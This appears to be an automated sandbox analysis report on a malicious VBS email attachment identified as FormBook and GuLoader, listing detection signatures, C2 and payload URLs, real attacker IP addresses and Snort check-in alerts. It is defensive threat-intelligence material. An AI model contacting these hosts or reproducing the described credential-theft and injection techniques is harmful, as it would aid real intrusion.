Windows Analysis Report
Unclear Proforma Invoice.vbs

Overview

General Information

Sample Name: Unclear Proforma Invoice.vbs
Analysis ID: 680487
MD5: 2ccae65c60d12ce9d0d097db0d58cefa
SHA1: 4114f1b5a7c5ded759ca00fcbb10acfb4c72085f
SHA256: d85deda96531cdada16f3d37ee1ad279289c60509f37b28e0d0dac0bd7e4c4ed

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign process
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc.)
Queries the volume information (name, serial number, etc.) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JavaScript / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Connects to several IPs in different countries
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

Source: Yara match File source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3081887285.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.3509051693.000000001EB00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6883034007.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.3203308089.000000000B761000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6860784078.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.6865229521.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: http://pesterbdd.com/images/Pester.png Avira URL Cloud: Label: malware
Source: 30.2.firefox.exe.2f1d7970.0.unpack Avira: Label: TR/Patched.Ren.Gen8
Source: 30.0.firefox.exe.2f1d7970.0.unpack Avira: Label: TR/Patched.Ren.Gen8
Source: 30.0.firefox.exe.2f1d7970.1.unpack Avira: Label: TR/Patched.Ren.Gen8
Source: 23.2.rundll32.exe.57a7970.4.unpack Avira: Label: TR/Patched.Ren.Gen8
Source: 23.2.rundll32.exe.36008a0.1.unpack Avira: Label: TR/Patched.Ren.Gen8
Source: 00000015.00000002.3485649482.0000000002E40000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.ymsb.info/tuid/"], "decoy": ["qimazii2893.com", "secureartist.com", "fullrmc.cloud", "hydroknow.com", "komerco-latam.com", "linuxizes.com", "onlinevoting.online", "et-secure.info", "shoolinart.net", "idealofta.store", "tresbichos.com", "worldbrands.wine", "susanne-morel-autorin.com", "blueonb.com", "programmedsolution.com", "eo3ql7.xyz", "digitalmarketingdegreemx.com", "contactar-parking.com", "billypainter.com", "pinitlabs.com", "theconsciouskart.com", "growonweb3.com", "laforet.info", "bynecessiti.com", "sowgh.com", "studioriopelle.com", "edico-al.com", "ghanesa.xyz", "emitacademy.com", "xc8b49c6mnmdts.xyz", "kondo0071.com", "wwwf2dni.com", "hikingtaibah.com", "muziclips.com", "vivi-italiano.com", "gebilay.com", "mojawapo.com", "aia-art.com", "spurgadgetclubtoday.com", "we-gamble.net", "kukula.biz", "maximilianvonah.com", "chaosschizophrenia.com", "thrrealestate.com", "minotaur.network", "crayative.com", "itsfindia.online", "beachandlakeresort.net", "psoriasis-cure.info", "receiveprim.online", "coolarts.xyz", "147bronzeway.com", "ap-render.com", "perspectiive.com", "5phutthuocbainhenhang.com", "vtubber.com", "motorcyclehelmets.win", "hongkongfun.site", "cecilialederer.com", "productislandsize.xyz", "5111.site", "conversacion.online", "svgjp.com", "detalinb.online"]}
Source: Binary string: l8C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.pdb source: powershell.exe, 00000004.00000002.3064710007.00000000054BC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ielowutil.pdbGCTL source: rundll32.exe, 00000017.00000002.6901001103.00000000057A7000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000017.00000002.6871882475.0000000003600000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.4148473571.000000002F1D7000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: l8C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.pdb| source: powershell.exe, 00000004.00000002.3056176789.0000000005352000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: ielowutil.exe, 00000015.00000003.2869442608.000000001EB08000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.2879705616.000000001ECB7000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3513266224.000000001EE60000.00000040.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3519720123.000000001EF8D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6898086927.000000000537D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3485670121.0000000004EE8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3494974915.000000000509C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6887898372.0000000005250000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ielowutil.exe, ielowutil.exe, 00000015.00000003.2869442608.000000001EB08000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.2879705616.000000001ECB7000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3513266224.000000001EE60000.00000040.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3519720123.000000001EF8D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6898086927.000000000537D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3485670121.0000000004EE8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3494974915.000000000509C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6887898372.0000000005250000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: ielowutil.exe, 00000015.00000003.3479628208.000000000336A000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3487380043.00000000030D0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: rundll32.pdbGCTL source: ielowutil.exe, 00000015.00000003.3479628208.000000000336A000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3487380043.00000000030D0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: ielowutil.pdb source: rundll32.exe, 00000017.00000002.6901001103.00000000057A7000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000017.00000002.6871882475.0000000003600000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.4148473571.000000002F1D7000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: firefox.pdb source: rundll32.exe, 00000017.00000003.4143320533.0000000007CC6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp

Networking

Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49754 -> 217.160.0.178:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49754 -> 217.160.0.178:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49754 -> 217.160.0.178:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49786 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49786 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49786 -> 188.114.96.3:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49787 -> 217.21.87.131:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49787 -> 217.21.87.131:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49787 -> 217.21.87.131:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49802 -> 154.80.183.133:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49802 -> 154.80.183.133:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49802 -> 154.80.183.133:80
Source: DNS query: www.ghanesa.xyz
Source: DNS query: www.coolarts.xyz
Source: DNS query: www.xc8b49c6mnmdts.xyz
Source: DNS query: www.productislandsize.xyz
Source: Malware configuration extractor URLs: www.ymsb.info/tuid/
Source: Joe Sandbox View ASN Name: PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID
Source: Joe Sandbox View IP Address: 103.150.61.226
Source: Joe Sandbox View IP Address: 66.29.155.228
Source: unknown Network traffic detected: IP country count 10
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 15:44:34 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 69 6e 75 78 69 7a 65 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.linuxizes.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Mon, 08 Aug 2022 15:45:36 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 08 Aug 2022 15:46:04 GMTContent-Type: text/htmlContent-Length: 146Connection: closeX-Seen-By: W1c2/pqHBqplxcWufHCkILxkNjrXdwdgtu6E0yACibU=,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjjsN8RUa0UkPSj4npW0X3Y,m0j2EEknGIVUW/liY8BLLl77sBeKLtHVaXbFQUDNQYPu/2EjeiyKjB/JVOb8T5VeX-Wix-Request-Id: 1659973564.2325226518761515557X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 15:46:19 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 69 6e 75 78 69 7a 65 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.linuxizes.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 15:46:21 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 69 6e 75 78 69 7a 65 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.linuxizes.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Mon, 08 Aug 2022 15:47:11 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 15:48:01 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 69 6e 75 78 69 7a 65 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.linuxizes.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Mon, 15 Nov 2021 17:41:01 GMTetag: "999-61929bad-4d963b7021e7aca9;;;"accept-ranges: bytescontent-length: 2457date: Mon, 08 Aug 2022 15:48:14 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Aug 2022 15:48:19 GMTServer: ApacheContent-Length: 268Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.xc8b49c6mnmdts.xyz Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Mon, 08 Aug 2022 15:48:50 GMTContent-Type: text/htmlContent-Length: 118Connection: close Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 Aug 2022 15:45:09 GMTServer: Apache/2.4.25 (Debian)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 4961Connection: closeContent-Type: text/html; charset=UTF-8
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 Aug 2022 15:46:45 GMTServer: Apache/2.4.25 (Debian)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 4961Connection: closeContent-Type: text/html; charset=UTF-8
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.169
Source: rundll32.exe, 00000017.00000002.6905405734.000000000648C000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000017.00000003.4077013374.000000000754F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000000.4142455378.000000002FEBC000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000017.00000002.6905405734.000000000648C000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000017.00000003.4077013374.000000000754F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000000.4142455378.000000002FEBC000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
Source: ielowutil.exe, 00000015.00000003.2877329785.000000000335E000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.3481308758.0000000003348000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.2876470901.000000000335E000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3489945907.0000000003348000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://101.99.94.169/
Source: ielowutil.exe, 00000015.00000003.3481308758.0000000003348000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3489945907.0000000003348000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://101.99.94.169/849
Source: ielowutil.exe, 00000015.00000002.3489945907.0000000003348000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://101.99.94.169/WHvBvQsIuWdD218.inf
Source: ielowutil.exe, 00000015.00000003.3481308758.0000000003348000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3489945907.0000000003348000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://101.99.94.169/WHvBvQsIuWdD218.inf3#
Source: ielowutil.exe, 00000015.00000003.3480804459.000000000332F000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3489499087.0000000003330000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://101.99.94.169/WHvBvQsIuWdD218.infU
Source: ielowutil.exe, 00000015.00000002.3490324911.000000000335E000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.3482336905.000000000335D000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.2877329785.000000000335E000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.3481308758.0000000003348000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.2876470901.000000000335E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://101.99.94.169/WHvBvQsIuWdD218.infwW
Source: ielowutil.exe, 00000015.00000003.3481308758.0000000003348000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3489945907.0000000003348000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://101.99.94.169/g
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://65bxm.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://bxs6w.emitacademy.com
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 00000016.00000000.3231171158.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3126642750.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3380505737.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 00000016.00000000.2889968847.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3162376915.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3030170625.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3315328206.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3405241936.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://i1upy.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://j4itc.emitacademy.com
